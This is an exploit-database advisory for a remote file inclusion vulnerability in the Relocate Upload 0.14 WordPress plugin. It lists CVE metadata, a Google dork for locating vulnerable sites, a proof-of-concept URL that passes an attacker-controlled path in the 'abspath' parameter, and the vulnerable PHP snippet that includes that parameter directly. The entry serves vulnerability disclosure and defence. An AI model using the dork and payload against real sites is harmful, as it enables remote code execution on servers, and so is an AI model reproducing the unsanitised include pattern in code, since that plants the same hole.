EXPLOITS

WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion

Author: Ben Schmidt
type: webapps
platform: php
port: 
date_added: 2011-09-19  
date_updated: 2011-09-19  
verified: 1  
codes: CVE-2012-1205;OSVDB-79250  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comrelocate-upload.0.14.zip  

raw file: 17869.txt  

# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       // WP setup and function access
        define('WP_USE_THEMES', false);
        require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter